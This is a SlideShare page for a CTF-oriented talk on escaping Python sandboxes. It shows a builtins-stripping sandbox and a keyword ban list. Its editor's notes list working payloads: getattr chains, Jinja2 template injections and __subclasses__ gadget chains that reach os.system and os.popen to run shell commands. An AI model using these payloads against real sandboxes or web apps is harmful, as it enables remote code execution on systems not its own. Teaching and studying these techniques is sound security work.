![from __future__ import print_function
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
del __builtins__.__dict__[x]](https://image.slidesharecdn.com/escapingthepythonsandbox-180605084938/75/escaping-the-python-sandbox-24-2048.jpg?cb=1666799075)
![banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]](https://image.slidesharecdn.com/escapingthepythonsandbox-180605084938/75/escaping-the-python-sandbox-25-2048.jpg?cb=1666799075)
Escaping the python sandbox
•0 likes•3,237 views
Report
Share
Download to read offline
There’s two things I really like: Capture the flag competitions and Python. Fortunately, I have found out that there are challenges that combine both. In my session I will talk about challenges from 3 different CTF competitions and about the upgraded challenges I wrote from PwCTF. I will explain the difficulties of creating Python Sandbox and I will show the security issues in the wild. Things you will learn from my session: * Why Python Sandbox is a bad idea * How to exploit Python Sandbox using knowledge of Python language to execute code remotely * Why it’s hard to protect Python from code execution using Web Application Firewall * At the end of the session you will get 3 pySandbox challenges to solve in order to check your abilities
More Related Content
What's hot
What's hot(20)
More from Tomer Zait
Recently uploaded
Recently uploaded(20)
Escaping the python sandbox
- 2. $ • • • • • @realgam3 • https://linkedin.com/in/realgam3 • https://github.com/realgam3
- 11. Objects
- 24. from __future__ import print_function targets = __builtins__.__dict__.keys() targets.remove('raw_input') targets.remove('print') for x in targets: del __builtins__.__dict__[x]
- 25. banned = [ "import", "exec", "eval", "pickle", "os", "subprocess", "kevin sucks", "input", "banned", "cry sum more", "sys" ]
- 27. https://Links • http://pyconil2018.realgame.co.il • https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90- 5-PySandbox.pdf • https://github.com/vstinner/pysandbox • https://nvisium.com/blog/2016/03/09/exploring-ssti-in- flask-jinja2.html
- 28. If You Really Like CTF Challenges
Editor's Notes
- My name is Tomer Zait and I'm a security researcher on F5 Networks. I’m practical software engineer and offensive security expert. I Love CTF'S and writing open source software's. By The Way Your are welcome to contribute code, or follow me in twitter or github.
- Secure Pyshell: print('') print("") print(".") print(open) print(__file__) print(open(__file__)) print(getattr(open(__file__),"read")) print(getattr(open(__file__),"read")()) print(__builtins__) print(dir(__builtins__)) print(getattr(__builtins__,"vars")) print(getattr(__builtins__,"va"+"rs")) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()) print(getattr(__builtins__,"va"+"rs")()["os"]) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")) print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
- Zumbo 3: {{1+1}} {{request.environ}} {{config}} {%set a = 1+2%}{{a}} {{config.__class__.__init__.__globals__}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {{[].__class__.__base__.__subclasses__()}} {{[].__class__.__base__.__subclasses__()[351]}} {%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}} http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
- print("".__class__.__mro__) print("".__class__.__mro__[-1].__subclasses__()) print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage')) print("".__class__.__mro__[-1].__subclasses__()[59].__init__) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"]) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys']) print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
- Ask “What are the actual alternatives that omer simpson has”?